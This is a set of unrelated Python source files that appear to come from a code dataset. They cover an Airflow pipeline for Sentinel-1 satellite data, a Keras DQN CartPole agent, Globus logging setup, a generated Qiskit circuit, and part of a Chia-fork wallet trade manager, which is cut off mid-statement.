"""Get Product / Band files path Dictionary from ZipInspector and extract the list of band files """
task_instance = kwargs['ti']
# band number from task name
task_id = task_instance.task_id
band_number = int(task_id.split('_')[-1])
log.info("Getting inputs from: " + get_inputs_from)
product_bands_dict = task_instance.xcom_pull(task_ids=get_inputs_from, key=XCOM_RETURN_KEY)
if product_bands_dict is None:
log.info("No input from ZipInspector. Nothing to do")
return None
log.info("Product Band Dictionary: {}".format(pprint.pformat(product_bands_dict)))
files_path=[]
for k in product_bands_dict:
files_path += product_bands_dict[k]
# Push one of the band paths to XCom
file_path = files_path[band_number - 1]
return [file_path]
# DAG definition
dag = DAG(S1GRD1SDV.id,
description='DAG for searching, filtering and downloading Sentinel 1 data from DHUS server',
schedule_interval=S1GRD1SDV.dag_schedule_interval,
catchup=False,
default_args=default_args
)
# DHUS Search Task Operator
search_task = DHUSSearchOperator(task_id='search_product_task',
dhus_url=CFG.dhus_url,
dhus_user=CFG.dhus_username,
dhus_pass=CFG.dhus_password,
geojson_bbox=S1GRD1SDV.dhus_search_bbox,
startdate=S1GRD1SDV.dhus_search_startdate,
enddate=S1GRD1SDV.dhus_search_enddate,
filter_max=S1GRD1SDV.dhus_filter_max,
order_by=S1GRD1SDV.dhus_search_orderby,
keywords=S1GRD1SDV.dhus_search_keywords,
dag=dag)
# DHUS Download Task Operator
download_task = DHUSDownloadOperator(task_id='download_product_task',
dhus_url=CFG.dhus_url,
dhus_user=CFG.dhus_username,
dhus_pass=CFG.dhus_password,
download_max=S1GRD1SDV.dhus_download_max,
download_dir=S1GRD1SDV.download_dir,
get_inputs_from=search_task.task_id,
download_timeout=timedelta(hours=12),
dag=dag)
# Rsync Archive Task for Products
archive_task = RSYNCOperator(task_id="upload_original_package",
host = CFG.rsync_hostname,
remote_usr = CFG.rsync_username,
ssh_key_file = CFG.rsync_ssh_key,
remote_dir = S1GRD1SDV.original_package_upload_dir,
get_inputs_from=download_task.task_id,
dag=dag)
# Zip Inspector and Extractor Task
zip_task = ZipInspector(task_id='zip_inspector',
extension_to_search='tiff',
get_inputs_from=download_task.task_id,
dag=dag)
warp_tasks = []
addo_tasks = []
upload_tasks = []
band_paths_tasks = []
for i in range(1, 3):
band_paths = PythonOperator(task_id="get_band_paths_" + str(i),
python_callable=prepare_band_paths,
op_kwargs={
'get_inputs_from': zip_task.task_id
},
dag=dag)
band_paths_tasks.append(band_paths)
warp = GDALWarpOperator(
task_id='gdalwarp_' + str(i),
target_srs=TARGET_SRS,
tile_size=TILE_SIZE,
overwrite=OVERWRITE,
dstdir=S1GRD1SDV.process_dir,
get_inputs_from=band_paths.task_id,
dag=dag
)
warp_tasks.append(warp)
addo = GDALAddoOperator(
trigger_rule=TriggerRule.ALL_SUCCESS,
resampling_method=RESAMPLING_METHOD,
max_overview_level=MAX_OVERVIEW_LEVEL,
task_id='gdal_addo_' + str(i),
get_inputs_from=warp.task_id,
dag=dag
)
addo_tasks.append(addo)
upload = RSYNCOperator(task_id="upload_granule_{}_task".format(str(i)),
host=CFG.rsync_hostname,
remote_usr=CFG.rsync_username,
ssh_key_file=CFG.rsync_ssh_key,
remote_dir=S1GRD1SDV.repository_dir,
get_inputs_from=addo.task_id,
dag=dag)
upload_tasks.append(upload)
band_paths.set_upstream(zip_task)
warp.set_upstream(band_paths)
addo.set_upstream(warp)
upload.set_upstream(addo)
# Metadata Extraction task
addo_task_ids = ( task.task_id for task in addo_tasks )
upload_task_ids = ( task.task_id for task in upload_tasks )
metadata_task = S1MetadataOperator(task_id="extract_metadata_task",
product_safe_path=None,
granules_paths=None,
granules_upload_dir=S1GRD1SDV.repository_dir,
processing_dir=S1GRD1SDV.process_dir,
original_package_download_base_url=S1GRD1SDV.original_package_download_base_url,
gs_workspace=S1GRD1SDV.geoserver_workspace,
bands_dict = S1GRD1SDV.bands_dict,
gs_wms_layer=S1GRD1SDV.geoserver_layer,
gs_wfs_featuretype=S1GRD1SDV.geoserver_featuretype,
gs_wfs_format=S1GRD1SDV.geoserver_oseo_wfs_format,
gs_wfs_version=S1GRD1SDV.geoserver_oseo_wfs_version,
gs_wms_width=S1GRD1SDV.geoserver_oseo_wms_width,
gs_wms_height=S1GRD1SDV.geoserver_oseo_wms_height,
gs_wms_format=S1GRD1SDV.geoserver_oseo_wms_format,
gs_wms_version=S1GRD1SDV.geoserver_oseo_wms_version,
gs_wcs_coverage_id=S1GRD1SDV.geoserver_coverage,
gs_wcs_scale_i=S1GRD1SDV.geoserver_oseo_wcs_scale_i,
gs_wcs_scale_j=S1GRD1SDV.geoserver_oseo_wcs_scale_j,
gs_wcs_format=S1GRD1SDV.geoserver_oseo_wcs_format,
gs_wcs_version=S1GRD1SDV.geoserver_oseo_wcs_version,
get_inputs_from = {
'download_task_id': download_task.task_id,
'addo_task_ids': addo_task_ids,
'upload_task_ids': upload_task_ids,
'archive_product_task_id' : archive_task.task_id,
},
dag=dag)
# Publish product.zip to GeoServer
publish_task = PythonOperator(task_id="publish_product_task",
python_callable=publish_product,
op_kwargs={
'geoserver_username': CFG.geoserver_username,
'geoserver_password': CFG.geoserver_password,
'geoserver_rest_endpoint': '{}/oseo/collections/{}/products'.format(CFG.geoserver_rest_url, S1GRD1SDV.geoserver_oseo_collection), 'get_inputs_from': metadata_task.task_id,
},
dag = dag)
if CFG.eoxserver_rest_url:
publish_eox_task = PythonOperator(task_id="publish_product_eox_task",
python_callable=publish_product,
op_kwargs={
'geoserver_username': CFG.eoxserver_username,
'geoserver_password': CFG.eoxserver_password,
'geoserver_rest_endpoint': CFG.eoxserver_rest_url,
'get_inputs_from': metadata_task.task_id,
},
dag = dag)
download_task.set_upstream(search_task)
archive_task.set_upstream(download_task)
zip_task.set_upstream(download_task)
metadata_task.set_upstream(download_task)
metadata_task.set_upstream(archive_task)
for task in upload_tasks:
metadata_task.set_upstream(task)
publish_task.set_upstream(metadata_task)
if CFG.eoxserver_rest_url:
publish_eox_task.set_upstream(metadata_task)
|
py | 1a37bfbd28e93c0b476a569b1c1fa632ad2e5fef | # -*- coding: utf-8 -*-
import random
import gym
import numpy as np
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import adam_v2
EPISODES = 1000
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=2000)
self.gamma = 0.95 # discount rate
self.epsilon = 1.0 # exploration rate
self.epsilon_min = 0.01
self.epsilon_decay = 0.995
self.learning_rate = 0.001
self.model = self._build_model()
def _build_model(self):
# Neural Net for Deep-Q learning Model
model = Sequential()
model.add(Dense(24, input_dim=self.state_size, activation='relu'))
model.add(Dense(24, activation='relu'))
model.add(Dense(self.action_size, activation='linear'))
model.compile(loss='mse',
optimizer=adam_v2.Adam(lr=self.learning_rate))
return model
def memorize(self, state, action, reward, next_state, done):
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
if np.random.rand() <= self.epsilon:
return random.randrange(self.action_size)
act_values = self.model.predict(state)
return np.argmax(act_values[0]) # returns action
def replay(self, batch_size):
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
target = reward
if not done:
target = (reward + self.gamma *
np.amax(self.model.predict(next_state)[0]))
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0)
if self.epsilon > self.epsilon_min:
self.epsilon *= self.epsilon_decay
def load(self, name):
self.model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
if __name__ == "__main__":
env = gym.make('CartPole-v1')
state_size = env.observation_space.shape[0]
action_size = env.action_space.n
agent = DQNAgent(state_size, action_size)
# agent.load("./save/cartpole-dqn.h5")
done = False
batch_size = 4
for e in range(EPISODES):
state = env.reset()
state = np.reshape(state, [1, state_size])
for time in range(500):
# env.render()
action = agent.act(state)
next_state, reward, done, _ = env.step(action)
reward = reward if not done else -10
next_state = np.reshape(next_state, [1, state_size])
agent.memorize(state, action, reward, next_state, done)
state = next_state
if done:
print("episode: {}/{}, score: {}, e: {:.2}"
.format(e, EPISODES, time, agent.epsilon))
break
if len(agent.memory) > batch_size:
agent.replay(batch_size)
if e % 10 == 0:
agent.save("./save/cartpole-dqn.h5") |
py | 1a37bfebce4750ee21f32e5cd22d8f1bba3ed51f | # AUTHENTICATION_BACKENDS = ('shub.plugins.globus.backend.GlobusOAuth2',)
# Show Globus log messages
import logging
logger = logging.getLogger("globus_sdk")
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.DEBUG)
|
py | 1a37c0c094d6f21f5dbf814b52b3cc46eb174f05 | # qubit number=5
# total number=56
import cirq
import qiskit
from qiskit.providers.aer import QasmSimulator
from qiskit.test.mock import FakeVigo
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
oracle = QuantumCircuit(controls, name="Zf")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.h(controls[n])
if n >= 2:
oracle.mcu1(pi, controls[1:], controls[0])
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[0]) # number=3
prog.h(input_qubit[0]) # number=53
prog.cz(input_qubit[2],input_qubit[0]) # number=54
prog.h(input_qubit[0]) # number=55
prog.z(input_qubit[2]) # number=46
prog.cx(input_qubit[2],input_qubit[0]) # number=47
prog.h(input_qubit[1]) # number=4
prog.rx(2.664070570244145,input_qubit[1]) # number=39
prog.h(input_qubit[2]) # number=5
prog.h(input_qubit[3]) # number=6
prog.h(input_qubit[2]) # number=49
prog.cz(input_qubit[3],input_qubit[2]) # number=50
prog.h(input_qubit[2]) # number=51
prog.h(input_qubit[4]) # number=21
Zf = build_oracle(n, f)
repeat = floor(sqrt(2 ** n) * pi / 4)
for i in range(repeat):
prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[3]) # number=40
prog.y(input_qubit[4]) # number=35
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=25
prog.cz(input_qubit[1],input_qubit[0]) # number=26
prog.h(input_qubit[0]) # number=27
prog.h(input_qubit[0]) # number=36
prog.cz(input_qubit[1],input_qubit[0]) # number=37
prog.h(input_qubit[0]) # number=38
prog.cx(input_qubit[1],input_qubit[0]) # number=41
prog.x(input_qubit[0]) # number=42
prog.cx(input_qubit[1],input_qubit[0]) # number=43
prog.cx(input_qubit[1],input_qubit[0]) # number=34
prog.cx(input_qubit[1],input_qubit[0]) # number=24
prog.cx(input_qubit[0],input_qubit[1]) # number=29
prog.cx(input_qubit[2],input_qubit[3]) # number=44
prog.x(input_qubit[1]) # number=30
prog.cx(input_qubit[0],input_qubit[1]) # number=31
prog.x(input_qubit[2]) # number=11
prog.x(input_qubit[3]) # number=12
if n>=2:
prog.mcu1(pi,input_qubit[1:],input_qubit[0])
prog.x(input_qubit[0]) # number=13
prog.x(input_qubit[1]) # number=14
prog.x(input_qubit[2]) # number=15
prog.x(input_qubit[3]) # number=16
prog.h(input_qubit[0]) # number=17
prog.h(input_qubit[1]) # number=18
prog.h(input_qubit[2]) # number=19
prog.h(input_qubit[3]) # number=20
prog.z(input_qubit[1]) # number=52
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
key = "00000"
f = lambda rep: str(int(rep == key))
prog = make_circuit(5,f)
backend = FakeVigo()
sample_shot =7924
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_noisy1523.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
|
py | 1a37c12381e172d11e4198d6fb936bf85df3f93d | import logging
import time
import traceback
from pathlib import Path
from secrets import token_bytes
from typing import Any, Dict, List, Optional, Tuple
from blspy import AugSchemeMPL
from dogechia.types.blockchain_format.coin import Coin
from dogechia.types.blockchain_format.program import Program
from dogechia.types.blockchain_format.sized_bytes import bytes32
from dogechia.types.spend_bundle import SpendBundle
from dogechia.types.coin_solution import CoinSolution
from dogechia.util.byte_types import hexstr_to_bytes
from dogechia.util.db_wrapper import DBWrapper
from dogechia.util.hash import std_hash
from dogechia.util.ints import uint32, uint64
from dogechia.wallet.cc_wallet import cc_utils
from dogechia.wallet.cc_wallet.cc_utils import CC_MOD, SpendableCC, spend_bundle_for_spendable_ccs, uncurry_cc
from dogechia.wallet.cc_wallet.cc_wallet import CCWallet
from dogechia.wallet.puzzles.genesis_by_coin_id_with_0 import genesis_coin_id_for_genesis_coin_checker
from dogechia.wallet.trade_record import TradeRecord
from dogechia.wallet.trading.trade_status import TradeStatus
from dogechia.wallet.trading.trade_store import TradeStore
from dogechia.wallet.transaction_record import TransactionRecord
from dogechia.wallet.util.trade_utils import (
get_discrepancies_for_spend_bundle,
get_output_amount_for_puzzle_and_solution,
get_output_discrepancy_for_puzzle_and_solution,
)
from dogechia.wallet.util.transaction_type import TransactionType
from dogechia.wallet.util.wallet_types import WalletType
from dogechia.wallet.wallet import Wallet
from dogechia.wallet.wallet_coin_record import WalletCoinRecord
class TradeManager:
wallet_state_manager: Any
log: logging.Logger
trade_store: TradeStore
@staticmethod
async def create(
wallet_state_manager: Any,
db_wrapper: DBWrapper,
name: str = None,
):
self = TradeManager()
if name:
self.log = logging.getLogger(name)
else:
self.log = logging.getLogger(__name__)
self.wallet_state_manager = wallet_state_manager
self.trade_store = await TradeStore.create(db_wrapper)
return self
async def get_offers_with_status(self, status: TradeStatus) -> List[TradeRecord]:
records = await self.trade_store.get_trade_record_with_status(status)
return records
async def get_coins_of_interest(
self,
) -> Tuple[Dict[bytes32, Coin], Dict[bytes32, Coin]]:
"""
Returns list of coins we want to check if they are included in filter,
These will include coins that belong to us and coins that that on other side of treade
"""
all_pending = []
pending_accept = await self.get_offers_with_status(TradeStatus.PENDING_ACCEPT)
pending_confirm = await self.get_offers_with_status(TradeStatus.PENDING_CONFIRM)
pending_cancel = await self.get_offers_with_status(TradeStatus.PENDING_CANCEL)
all_pending.extend(pending_accept)
all_pending.extend(pending_confirm)
all_pending.extend(pending_cancel)
removals = {}
additions = {}
for trade in all_pending:
for coin in trade.removals:
removals[coin.name()] = coin
for coin in trade.additions:
additions[coin.name()] = coin
return removals, additions
async def get_trade_by_coin(self, coin: Coin) -> Optional[TradeRecord]:
all_trades = await self.get_all_trades()
for trade in all_trades:
if trade.status == TradeStatus.CANCELED.value:
continue
if coin in trade.removals:
return trade
if coin in trade.additions:
return trade
return None
async def coins_of_interest_farmed(self, removals: List[Coin], additions: List[Coin], height: uint32):
"""
If both our coins and other coins in trade got removed that means that trade was successfully executed
If coins from other side of trade got farmed without ours, that means that trade failed because either someone
else completed trade or other side of trade canceled the trade by doing a spend.
If our coins got farmed but coins from other side didn't, we successfully canceled trade by spending inputs.
"""
removal_dict = {}
addition_dict = {}
checked: Dict[bytes32, Coin] = {}
for coin in removals:
removal_dict[coin.name()] = coin
for coin in additions:
addition_dict[coin.name()] = coin
all_coins = []
all_coins.extend(removals)
all_coins.extend(additions)
for coin in all_coins:
if coin.name() in checked:
continue
trade = await self.get_trade_by_coin(coin)
if trade is None:
self.log.error(f"Coin: {Coin}, not in any trade")
continue
# Check if all coins that are part of the trade got farmed
# If coin is missing, trade failed
failed = False
for removed_coin in trade.removals:
if removed_coin.name() not in removal_dict:
self.log.error(f"{removed_coin} from trade not removed")
failed = True
checked[removed_coin.name()] = removed_coin
for added_coin in trade.additions:
if added_coin.name() not in addition_dict:
self.log.error(f"{added_coin} from trade not added")
failed = True
checked[coin.name()] = coin
if failed is False:
# Mark this trade as successful
await self.trade_store.set_status(trade.trade_id, TradeStatus.CONFIRMED, True, height)
self.log.info(f"Trade with id: {trade.trade_id} confirmed at height: {height}")
else:
# Either we canceled this trade or this trade failed
if trade.status == TradeStatus.PENDING_CANCEL.value:
await self.trade_store.set_status(trade.trade_id, TradeStatus.CANCELED, True)
self.log.info(f"Trade with id: {trade.trade_id} canceled at height: {height}")
elif trade.status == TradeStatus.PENDING_CONFIRM.value:
await self.trade_store.set_status(trade.trade_id, TradeStatus.FAILED, True)
self.log.warning(f"Trade with id: {trade.trade_id} failed at height: {height}")
async def get_locked_coins(self, wallet_id: int = None) -> Dict[bytes32, WalletCoinRecord]:
"""Returns a dictionary of confirmed coins that are locked by a trade."""
all_pending = []
pending_accept = await self.get_offers_with_status(TradeStatus.PENDING_ACCEPT)
pending_confirm = await self.get_offers_with_status(TradeStatus.PENDING_CONFIRM)
pending_cancel = await self.get_offers_with_status(TradeStatus.PENDING_CANCEL)
all_pending.extend(pending_accept)
all_pending.extend(pending_confirm)
all_pending.extend(pending_cancel)
if len(all_pending) == 0:
return {}
result = {}
for trade_offer in all_pending:
if trade_offer.tx_spend_bundle is None:
locked = await self.get_locked_coins_in_spend_bundle(trade_offer.spend_bundle)
else:
locked = await self.get_locked_coins_in_spend_bundle(trade_offer.tx_spend_bundle)
for name, record in locked.items():
if wallet_id is None or record.wallet_id == wallet_id:
result[name] = record
return result
async def get_all_trades(self):
all: List[TradeRecord] = await self.trade_store.get_all_trades()
return all
async def get_trade_by_id(self, trade_id: bytes) -> Optional[TradeRecord]:
record = await self.trade_store.get_trade_record(trade_id)
return record
async def get_locked_coins_in_spend_bundle(self, bundle: SpendBundle) -> Dict[bytes32, WalletCoinRecord]:
"""Returns a list of coin records that are used in this SpendBundle"""
result = {}
removals = bundle.removals()
for coin in removals:
coin_record = await self.wallet_state_manager.coin_store.get_coin_record(coin.name())
if coin_record is None:
continue
result[coin_record.name()] = coin_record
return result
async def cancel_pending_offer(self, trade_id: bytes32):
await self.trade_store.set_status(trade_id, TradeStatus.CANCELED, False)
async def cancel_pending_offer_safely(self, trade_id: bytes32):
"""This will create a transaction that includes coins that were offered"""
self.log.info(f"Secure-Cancel pending offer with id trade_id {trade_id.hex()}")
trade = await self.trade_store.get_trade_record(trade_id)
if trade is None:
return None
all_coins = trade.removals
for coin in all_coins:
wallet = await self.wallet_state_manager.get_wallet_for_coin(coin.name())
if wallet is None:
continue
new_ph = await wallet.get_new_puzzlehash()
if wallet.type() == WalletType.COLOURED_COIN.value:
tx = await wallet.generate_signed_transaction(
[coin.amount], [new_ph], 0, coins={coin}, ignore_max_send_amount=True
)
else:
tx = await wallet.generate_signed_transaction(
coin.amount, new_ph, 0, coins={coin}, ignore_max_send_amount=True
)
await self.wallet_state_manager.add_pending_transaction(tx_record=tx)
await self.trade_store.set_status(trade_id, TradeStatus.PENDING_CANCEL, False)
return None
async def save_trade(self, trade: TradeRecord):
await self.trade_store.add_trade_record(trade, False)
async def create_offer_for_ids(
self, offer: Dict[int, int], file_name: str
) -> Tuple[bool, Optional[TradeRecord], Optional[str]]:
success, trade_offer, error = await self._create_offer_for_ids(offer)
if success is True and trade_offer is not None:
self.write_offer_to_disk(Path(file_name), trade_offer)
await self.save_trade(trade_offer)
return success, trade_offer, error
async def _create_offer_for_ids(self, offer: Dict[int, int]) -> Tuple[bool, Optional[TradeRecord], Optional[str]]:
"""
Offer is dictionary of wallet ids and amount
"""
spend_bundle = None
try:
for id in offer.keys():
amount = offer[id]
wallet_id = uint32(int(id))
wallet = self.wallet_state_manager.wallets[wallet_id]
if isinstance(wallet, CCWallet):
balance = await wallet.get_confirmed_balance()
if balance < abs(amount) and amount < 0:
raise Exception(f"insufficient funds in wallet {wallet_id}")
if amount > 0:
if spend_bundle is None:
to_exclude: List[Coin] = []
else:
to_exclude = spend_bundle.removals()
zero_spend_bundle: SpendBundle = await wallet.generate_zero_val_coin(False, to_exclude)
if spend_bundle is None:
spend_bundle = zero_spend_bundle
else:
spend_bundle = SpendBundle.aggregate([spend_bundle, zero_spend_bundle])
additions = zero_spend_bundle.additions()
removals = zero_spend_bundle.removals()
zero_val_coin: Optional[Coin] = None
for add in additions:
if add not in removals and add.amount == 0:
zero_val_coin = add
new_spend_bundle = await wallet.create_spend_bundle_relative_amount(amount, zero_val_coin)
else:
new_spend_bundle = await wallet.create_spend_bundle_relative_amount(amount)
elif isinstance(wallet, Wallet):
if spend_bundle is None:
to_exclude = []
else:
to_exclude = spend_bundle.removals()
new_spend_bundle = await wallet.create_spend_bundle_relative_dogechia(amount, to_exclude)
else:
return False, None, "unsupported wallet type"
if new_spend_bundle is None or new_spend_bundle.removals() == []:
raise Exception(f"Wallet {id} was unable to create offer.")
if spend_bundle is None:
spend_bundle = new_spend_bundle
else:
spend_bundle = SpendBundle.aggregate([spend_bundle, new_spend_bundle])
if spend_bundle is None:
return False, None, None
now = uint64(int(time.time()))
trade_offer: TradeRecord = TradeRecord(
confirmed_at_index=uint32(0),
accepted_at_time=None,
created_at_time=now,
my_offer=True,
sent=uint32(0),
spend_bundle=spend_bundle,
tx_spend_bundle=None,
additions=spend_bundle.additions(),
removals=spend_bundle.removals(),
trade_id=std_hash(spend_bundle.name() + bytes(now)),
status=uint32(TradeStatus.PENDING_ACCEPT.value),
sent_to=[],
)
return True, trade_offer, None
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Error with creating trade offer: {type(e)}{tb}")
return False, None, str(e)
def write_offer_to_disk(self, file_path: Path, offer: TradeRecord):
if offer is not None:
file_path.write_text(bytes(offer).hex())
async def get_discrepancies_for_offer(self, file_path: Path) -> Tuple[bool, Optional[Dict], Optional[Exception]]:
self.log.info(f"trade offer: {file_path}")
trade_offer_hex = file_path.read_text()
trade_offer = TradeRecord.from_bytes(bytes.fromhex(trade_offer_hex))
return get_discrepancies_for_spend_bundle(trade_offer.spend_bundle)
async def get_inner_puzzle_for_puzzle_hash(self, puzzle_hash) -> Program:
info = await self.wallet_state_manager.puzzle_store.get_derivation_record_for_puzzle_hash(puzzle_hash.hex())
assert info is not None
puzzle = self.wallet_state_manager.main_wallet.puzzle_for_pk(bytes(info.pubkey))
return puzzle
async def maybe_create_wallets_for_offer(self, file_path: Path) -> bool:
success, result, error = await self.get_discrepancies_for_offer(file_path)
if not success or result is None:
return False
for key, value in result.items():
wsm = self.wallet_state_manager
wallet: Wallet = wsm.main_wallet
if key == "dogechia":
continue
self.log.info(f"value is {key}")
exists = await wsm.get_wallet_for_colour(key)
if exists is not None:
continue
await CCWallet.create_wallet_for_cc(wsm, wallet, key)
return True
async def respond_to_offer(self, file_path: Path) -> Tuple[bool, Optional[TradeRecord], Optional[str]]:
has_wallets = await self.maybe_create_wallets_for_offer(file_path)
if not has_wallets:
return False, None, "Unknown Error"
trade_offer = None
try:
trade_offer_hex = file_path.read_text()
trade_offer = TradeRecord.from_bytes(hexstr_to_bytes(trade_offer_hex))
except Exception as e:
return False, None, f"Error: {e}"
if trade_offer is not None:
offer_spend_bundle: SpendBundle = trade_offer.spend_bundle
coinsols: List[CoinSolution] = [] # [] of CoinSolutions
cc_coinsol_outamounts: Dict[bytes32, List[Tuple[CoinSolution, int]]] = dict()
aggsig = offer_spend_bundle.aggregated_signature
cc_discrepancies: Dict[bytes32, int] = dict()
dogechia_discrepancy = None
wallets: Dict[bytes32, Any] = dict() # colour to wallet dict
for coinsol in offer_spend_bundle.coin_solutions:
puzzle: Program = Program.from_bytes(bytes(coinsol.puzzle_reveal))
solution: Program = Program.from_bytes(bytes(coinsol.solution))
# work out the deficits between coin amount and expected output for each
r = cc_utils.uncurry_cc(puzzle)
if r:
# Calculate output amounts
mod_hash, genesis_checker, inner_puzzle = r
colour = bytes(genesis_checker).hex()
if colour not in wallets:
wallets[colour] = await self.wallet_state_manager.get_wallet_for_colour(colour)
unspent = await self.wallet_state_manager.get_spendable_coins_for_wallet(wallets[colour].id())
if coinsol.coin in [record.coin for record in unspent]:
return False, None, "can't respond to own offer"
innersol = solution.first()
total = get_output_amount_for_puzzle_and_solution(inner_puzzle, innersol)
if colour in cc_discrepancies:
cc_discrepancies[colour] += coinsol.coin.amount - total
else:
cc_discrepancies[colour] = coinsol.coin.amount - total
# Store coinsol and output amount for later
if colour in cc_coinsol_outamounts:
cc_coinsol_outamounts[colour].append((coinsol, total))
else:
cc_coinsol_outamounts[colour] = [(coinsol, total)]
else:
# standard dogechia coin
unspent = await self.wallet_state_manager.get_spendable_coins_for_wallet(1)
if coinsol.coin in [record.coin for record in unspent]:
return False, None, "can't respond to own offer"
if dogechia_discrepancy is None:
dogechia_discrepancy = get_output_discrepancy_for_puzzle_and_solution(coinsol.coin, puzzle, solution)
else:
dogechia_discrepancy += get_output_discrepancy_for_puzzle_and_solution(coinsol.coin, puzzle, solution)
coinsols.append(coinsol)
dogechia_spend_bundle: Optional[SpendBundle] = None
if dogechia_discrepancy is not None:
dogechia_spend_bundle = await self.wallet_state_manager.main_wallet.create_spend_bundle_relative_dogechia(
dogechia_discrepancy, []
)
if dogechia_spend_bundle is not None:
for coinsol in coinsols:
dogechia_spend_bundle.coin_solutions.append(coinsol)
zero_spend_list: List[SpendBundle] = []
spend_bundle = None
# create coloured coin
self.log.info(cc_discrepancies)
for colour in cc_discrepancies.keys():
if cc_discrepancies[colour] < 0:
my_cc_spends = await wallets[colour].select_coins(abs(cc_discrepancies[colour]))
else:
if dogechia_spend_bundle is None:
to_exclude: List = []
else:
to_exclude = dogechia_spend_bundle.removals()
my_cc_spends = await wallets[colour].select_coins(0)
if my_cc_spends is None or my_cc_spends == set():
zero_spend_bundle: SpendBundle = await wallets[colour].generate_zero_val_coin(False, to_exclude)
if zero_spend_bundle is None:
return (
False,
None,
"Unable to generate zero value coin. Confirm that you have dogechia available",
)
zero_spend_list.append(zero_spend_bundle)
additions = zero_spend_bundle.additions()
removals = zero_spend_bundle.removals()
my_cc_spends = set()
for add in additions:
if add not in removals and add.amount == 0:
my_cc_spends.add(add)
if my_cc_spends == set() or my_cc_spends is None:
return False, None, "insufficient funds"
# Create SpendableCC list and innersol_list with both my coins and the offered coins
# Firstly get the output coin
my_output_coin = my_cc_spends.pop()
spendable_cc_list = []
innersol_list = []
genesis_id = genesis_coin_id_for_genesis_coin_checker(Program.from_bytes(bytes.fromhex(colour)))
# Make the rest of the coins assert the output coin is consumed
for coloured_coin in my_cc_spends:
inner_solution = self.wallet_state_manager.main_wallet.make_solution(consumed=[my_output_coin.name()])
inner_puzzle = await self.get_inner_puzzle_for_puzzle_hash(coloured_coin.puzzle_hash)
assert inner_puzzle is not None
sigs = await wallets[colour].get_sigs(inner_puzzle, inner_solution, coloured_coin.name())
sigs.append(aggsig)
aggsig = AugSchemeMPL.aggregate(sigs)
lineage_proof = await wallets[colour].get_lineage_proof_for_coin(coloured_coin)
spendable_cc_list.append(SpendableCC(coloured_coin, genesis_id, inner_puzzle, lineage_proof))
innersol_list.append(inner_solution)
# Create SpendableCC for each of the coloured coins received
for cc_coinsol_out in cc_coinsol_outamounts[colour]:
cc_coinsol = cc_coinsol_out[0]
puzzle = Program.from_bytes(bytes(cc_coinsol.puzzle_reveal))
solution = Program.from_bytes(bytes(cc_coinsol.solution))
r = uncurry_cc(puzzle)
if r:
mod_hash, genesis_coin_checker, inner_puzzle = r
inner_solution = solution.first()
lineage_proof = solution.rest().rest().first()
spendable_cc_list.append(SpendableCC(cc_coinsol.coin, genesis_id, inner_puzzle, lineage_proof))
innersol_list.append(inner_solution)
# Finish the output coin SpendableCC with new information
newinnerpuzhash = await wallets[colour].get_new_inner_hash()
outputamount = sum([c.amount for c in my_cc_spends]) + cc_discrepancies[colour] + my_output_coin.amount
inner_solution = self.wallet_state_manager.main_wallet.make_solution(
primaries=[{"puzzlehash": newinnerpuzhash, "amount": outputamount}]
)
inner_puzzle = await self.get_inner_puzzle_for_puzzle_hash(my_output_coin.puzzle_hash)
assert inner_puzzle is not None
lineage_proof = await wallets[colour].get_lineage_proof_for_coin(my_output_coin)
spendable_cc_list.append(SpendableCC(my_output_coin, genesis_id, inner_puzzle, lineage_proof))
innersol_list.append(inner_solution)
sigs = await wallets[colour].get_sigs(inner_puzzle, inner_solution, my_output_coin.name())
sigs.append(aggsig)
aggsig = AugSchemeMPL.aggregate(sigs)
if spend_bundle is None:
spend_bundle = spend_bundle_for_spendable_ccs(
CC_MOD,
Program.from_bytes(bytes.fromhex(colour)),
spendable_cc_list,
innersol_list,
[aggsig],
)
else:
new_spend_bundle = spend_bundle_for_spendable_ccs(
CC_MOD,
Program.from_bytes(bytes.fromhex(colour)),
spendable_cc_list,
innersol_list,
[aggsig],
)
spend_bundle = SpendBundle.aggregate([spend_bundle, new_spend_bundle])
# reset sigs and aggsig so that they aren't included next time around
sigs = []
aggsig = AugSchemeMPL.aggregate(sigs)
my_tx_records = []
if zero_spend_list is not None and spend_bundle is not None:
zero_spend_list.append(spend_bundle)
spend_bundle = SpendBundle.aggregate(zero_spend_list)
if spend_bundle is None:
return False, None, "spend_bundle missing"
# Add transaction history for this trade
now = uint64(int(time.time()))
if dogechia_spend_bundle is not None:
spend_bundle = SpendBundle.aggregate([spend_bundle, dogechia_spend_bundle])
if dogechia_discrepancy < 0:
tx_record = TransactionRecord(
confirmed_at_height=uint32(0),
created_at_time=now,
to_puzzle_hash=token_bytes(),
